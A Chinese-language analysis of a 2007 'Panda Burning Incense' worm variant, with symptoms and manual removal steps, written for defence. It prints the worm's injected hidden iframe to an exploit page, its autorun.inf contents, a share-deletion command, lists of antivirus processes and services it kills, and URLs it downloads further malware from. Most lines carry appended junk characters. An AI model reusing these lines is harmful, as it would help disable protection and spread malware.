熊猫烧香最新变种分析及查杀方法

文件名称：nvscv32.exe 4 H<.  
7];AB;0"  
病毒名称：目前各杀毒软件无法查杀（已经将病毒样本上报各杀毒厂商） ?T1vc  
we("#s1=  
中文名称：（尼姆亚，熊猫烧香） y -6{>P/  
lwSZpS  
病毒大小：68,570 字节 *VX"_C0Jy=  
EjA3hHJ  
编写语言：Borland Delphi 6.0 - 7.0 CE5A^,EsB  
?d!*[K
e8  
加壳方式：FSG 2.0 -> bart/xt !V^wq]D2  
42oW]b%P{;  
发现时间：2007.1.16 XJZ\ss  
M&[bb $00j  
危害等级：高 !{1;wC(b  
#}p@+rkg2  
一、病毒描述： | V:9 ][\  
v:F_!Q  
含有病毒体的文件被运行后，病毒将自身拷贝至系统目录，同时修改注册表将自身设置为开机启动项，并遍历各个驱动器，将自身写入磁盘根目录下，增加一个 Autorun.inf文件，使得用户打开该盘时激活病毒体。随后病毒体开一个线程进行本地文件感染，并对局域网其他电脑进行扫描，同时开另外一个线程连接某网站下载木马程序进行发动恶意攻击。 V?L8BRnV  
1agNwFd~  
二：中毒现象： 11^.oa+`  
8P?p  
1：在系统每个分区根目录下存在setup.exe和autorun.inf文件（A和B盘不感染）。 oBS m>V
 
]qd$rX  
2：无法手工修改“文件夹选项”将隐藏文件显示出来。 ?S<`*O +  
|NdWx1  
3：在每个感染后的文件夹中可见Desktop_ini的隐藏文件，内容为感染日期 如：2007-1-16
~dBx<  
eF"k"Ckt'  
4：电脑上的所有脚本文件中加入以下代码：<iframe src=http://www.krvkr.com/worm.htm width=”0” height=”0”></iframe> BHu%x|d  
~tc,p  
5:中毒后的机器上常见的反病毒软件及防火墙无法正常开启及运行。 1j*E/L  
n\i~H  
6：不能正常使用任务管理器，SREng.exe等工具。 BROn2aSx%  
eH_< <Xh!v  
7：无故的向外发包，连接局域网中其他机器。 }`pxs  
 ;?G..,  
三：技术分析 I}sb0 Q&  
GYt|[GC  
1：病毒文件运行后,将自身复制到%SystemRoot%\system32\drivers\nvscv32.exe Kh8  
/jl/SV+  
建立注册表自启动项: cC*H.N  
HfPu~P  
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\] q4T98s2J  
hHk9O?  
nvscv32: "C:\WINDOWS\system32\drivers\nvscv32.exe" O?`_RN4l  
qKD Nw8>  
2：查找反病毒窗体病毒结束相关进程: ri/CLq^D  
7'!DK;=TD6  
天网防火墙 _
:\zbn0\  
eakQZ-Q  
virusscan +>ld  
K=Z.<f  
symantec antivirus /o^/J~/3  
-
i#Kpf  
system safety monitor z5J$".O`  
&0`i(l4]l  
system repair engineer 7Ucq(,\./  
+a"f)4\
 
wrapped gift killer E*x ct-m#  
0VZC7@  
游戏木马检测大师 Mi}.  
g3 opN>W  
超级巡警 [(2XL"4D  
@\WeI"^F8  
3：结束以下进程: T0{X,  
&^7(?C'u  
mcshield.exe K: |-s4=  
\30rF]F`l  
vstskmgr.exe FR']Rj  
6HZVBZhM  
naprdmgr.exe DLN zH  
UyAy?i8K  
updaterui.exe "vX\Q rL  
CiV^bYi  
tbmon.exe Ro_jf

M  
iwy;9x  
scan32.exe p^1~o/  
2;K2|G7  
ravmond.exe @*roW{?!  
L_tjclk0J  
ccenter.exe DKF` xuJP  
Q-7L,2TL  
ravtask.exe fDRG+/q(+  
6rWb2b  
rav.exe 7&dK_x,a  
vY7@1_"  
ravmon.exe WXY-]ir.  
uvAJJIae'  
ravmond.exe P;eXUF+jn  
A&A{Thz  
ravstub.exe ~)VI`36X  
g4y&6!g  
kvxp.kxp eM@xs<BR  
tAPf#7{|   
kvmonxp.kxp ^H -a@QM  
phQ{<wzwp  
kvcenter.kxp oQA,57B  
dUUg}
/  
kvsrvxp.exe J0imWluhQ  
>?#zPweA  
kregex.exe K)  Ums-b  
A+
j!VM   
uihost.exe E3] 8(P%D-  
7X)4ec9H\  
trojdie.kxp X:lStO#5  
dai+"  
frogagent.exe NTEN
 
7xFZJ#  
kvxp.kxp Cg|\UKfy$  
[$F*R@,&  
kvmonxp.kxp a`[9<AM1#  
\._|_+HiW  
kvcenter.kxp gm%cAme  
%P{3c~?DH  
kvsrvxp.exe *U}ztH-+/  
VkO*+"cGv  
kregex.exe (L1F],Au  
$}'(%\7"  
uihost.exe !iq|sXs  
V/:
2xT  
trojdie.kxp nW} s  
$$uMu{?0i  
frogagent.exe 2[;~@n1P  
<s7cCpUFP  
logo1_.exe ~L>86/hP,N  
&YcOmI/MM  
logo_1.exe Ndmw/ae  
c-v-UO%  
rundl132.exe rLE+t(x(0  
tj*/%G{Y  
taskmgr.exe awI{%u_(nA  
lD, ~%  
msconfig.exe j@w1S[vt  
~A1!!rJX  
regedit.exe #@xB ?u-0q  
ky-nP8L}  
sreng.exe +jK-k_  
4：禁用下列服务: 2wDDVUwyB  
HTv#2WX  
schedule <5,|h3]-#  
(Q @'fb9z  
sharedaccess Q
Q_7Q^  
vj344B  
rsccenter `R>z{-@=  
 jr_z ?  
rsravmon jd,i=P%  
ZHa>8x;Mjl  
rsccenter 6}?d%K  
01n132k  
kvwsc cs?WE9N  
><Zu+HX  
kvsrvxp uo J0wG.  
lixM0  
kvwsc vy7/
 
1DhC,)+D}q  
kvsrvxp c{_JPy  
gua7<z6=eh  
kavsvc L
t=32SvTn  
eU@Mv5&6  
avp ""XAUxo  
u '/)l}  
avp $+_1F`  
7s#8-i  
kavsvc mO]>]   
rhy-o?  
mcafeeframework LiV&47e*>  
_@!vF,Wcf  
mcshield N0-J=2  
-{ 1P`&G  
mctaskmanager @ci..::5  
VXWV Pj#  
mcafeeframework vdAd@Z~\  
.=TXi<8Brw  
mcshield !C05;x8{  
+(92}~RK  
mctaskmanager N`,\1hHMT  
`G/g/>y  
navapsvc )\EIXTZY=  
/\# f@Sg  
wscsvc pR93T+X  
p\&/m  
kpfwsvc h!K" ;qw  
8K-P]]  
sndsrvc GRbbU#/=G  
!ess.U&m'  
ccproxy 3CjixXaA$  
RuIBOo\XL7  
ccevtmgr ~M-L+X
Zl(  
7~XA92  
ccsetmgr )Yy5u'}  
2#R$-*;#  
spbbcsvc 6>rz=yAM_  
69)"T{7  
symantec core lc EI6kBRMo  
BJWlx*U]  
npfmntor ; Z7!BU  
&RARK8^  
mskservice 8IRKCuV  
7
<!x:G?C  
firesvc qz]qG=wmL  
U\H[.qY-  
5：删除下列注册表项: IRx%L?  
'QG`^@Z  
software\microsoft\windows\currentversion\run\ravtask 5~?6]=hl  
,o%by5j"^N  
software\microsoft\windows\currentversion\run\kvmonxp &d2L9kTk  
x0JW  
software\microsoft\windows\currentversion\run\kav aYT!xdCI  
M.t,o\xl  
software\microsoft\windows\currentversion\run\kavpersonal50 5)T[ha77u  
SDO:Gma  
software\microsoft\windows\currentversion\run\mcafeeupdaterui 7)jN:+4N  
<i</pA  
software\microsoft\windows\currentversion\run\network associates error reporting service ]b%U9hmL^f  
^.8~}TT-U  
software\microsoft\windows\currentversion\run\shstatexe IxCesh  
-#9e
t30  
software\microsoft\windows\currentversion\run\ylive.exe y4h
=e~  
ptT-{vG  
software\microsoft\windows\currentversion\run\yassistse _|I8+(~)  
yPtE5"(o  
6：感染所有可执行文件，并将图标改成（这次不是熊猫烧香那个图标了） T
YGI f4z  
Q&r.wV|  
7：跳过下列目录: ]-X6Cl  
D tZ?sG  
windows gjG SI'M0B  
GxD`M2  
winnt (
@XQ]S}L  
@,.D]43  
systemvolumeinformation GD.Ss9_h1  
AE~a=e\x  
recycled qH4|k2Lm  
stajTN*J  
windowsnt o{#aF=`{  
S:j{R^$k  
windowsupdate u~M$<|;  
Cwls e-  
windowsmediaplayer 2_HIn  
IxuK<Oe:O  
outlookexpress Z[*unIk  
o|h=M/  
netmeeting VBi g
UK4  
u>9` ?O44  
commonfiles ?ld&}|W~  
d~~, 5E  
complusapplications D#1R$4M=  
Y|r7gy9%  
commonfiles 41Q5%2  
njxLeDe-  
messenger *z69ti/ t  
I?PqWG!O  
installshieldinstallationinformation :5&D6  
?}8r h%  
msn `OMX
9i  
Ny7*MZ-  
microsoftfrontpage /Z?o%/bw:  
j8Z;}Ps  
moviemaker 9qCE{[(  
,uC-^T |n  
msngaminzone *t| !xO  
$T3_~7N  
8：删除*.gho备份文件. qA)YYg/G  
.kU^)H"l  
9：在所有驱动器根目录建立自身文件副本setup.exe,建立autorun.inf文件使病毒自动运行,设置文件属性为隐藏、只读、系统. ,V!"4T,Z  
!@Qk=Xkg  
autorun.inf内容： 8_4!Ar>2
 
;dUKFdKH}  
程序代码 V4jMx[  
dVB#Np  
[AutoRun] WlQCPC  
v}u]tl$,  
OPEN=setup.exe $]_SPu  
6:|;O  
shellexecute=setup.exe d*s*AV  
34!.5^T  
shell\Auto\command=setup.exe kll!tT-N-  
QG?!XWz  
10：删除共享：cmd.exe /c net share admin$ /del /y -(?/95 Y  
9pnOAM}  
11：在机器上所有脚本文件中加入<iframe src=http://www.krvkr.com/worm.htm width=”0” height=”0”></iframe>，此代码地址是一个利用MS-06014漏洞攻击的网页木马，一旦用户浏览中此病毒的服务器上的网页，如果系统没有打补丁，就会下载执行此病毒。 }p6]az3  
Jyg1z,B <  
12：扫描局域网机器，一旦发现漏洞，就迅速传播。 w*XM*yJHU  
13：在后台访问http://www.whboy.net/update/wormcn.txt，根据下载列表下载其他病毒。 mM&P&mz/D  
J' uaZI>'  
目前下载列表如下： <$-^^b(y  
~{lb`M^]h  
http://www.krvkr.com/down/cq.exe 9R8q+2  
~xxq.rL"  
http://www.krvkr.com/down/mh.exe +Xw%X3o)  
r]cq|Nv8:  
http://www.krvkr.com/down/my.exe 
b 3Q6-  
zGU MH7 M  
http://www.krvkr.com/down/wl.exe rd0Fd+t/  

PI%l  
http://www.krvkr.com/down/rx.exe kbb!2`F!%  

trrNu  
http://www.krvkr.com/down/wow.exe cJ$jU{}  
HI|egf@  
http://www.krvkr.com/down/zt.exe THQ #zQ-  
QxW+|Gt._  
http://www.krvkr.com/down/wm.exe .TA)|df ^  
Kt*b) <  
http://www.krvkr.com/down/dj.exe ?1\I/'E9  
ZPw4S2yw3.  
http://www.krvkr.com/cn/iechajian.exe wnd #J `  
.B~yI3D`M  
到此病毒行为分析完毕。 1W>/4l  
K>.}>)0  
四：Sec120.Com专家解决方案： 9~Sa7P  
el5Pe{j'  
1：关闭网络共享，断开网络。 @uyQH c,V  
:MF`q.:X  
2：使用IceSword结束掉nvscv32.exe进程（速度要快，抢在病毒感染IceSword前） a({Rb?b  
&_Cc  
3:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL CheckedValue的数值改为1 ,YM=?No  
gWU#NRRc  
4：删除注册表启动项 0(+<uo~6p1  
}Y!V3s1bm  
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\] |GQq:MB;z  
&cyB}Gv  
nvscv32: "C:\WINDOWS\system32\drivers\nvscv32.exe" Pq+|*Y<|&  
]*a(^*}A%  
5：删除C:\WINDOWS\system32\drivers\nvscv32.exe zu?112-v2  
`m(ZX\W]  
6：删除每个盘根目录下的autorun.inf文件和setup.exe文件，利用搜索功能，将Desktop_.ini全部删除。 7#"NKxb  
'Y2$9qy-L  
7：如果电脑上有脚本文件，将病毒代码全部删除。 c$[2tZ  
>b\|%=(x!*  
8：关闭系统的自动播放功能。 A7YCSjB  
Ynf "g#(  
这样就基本上将病毒清除了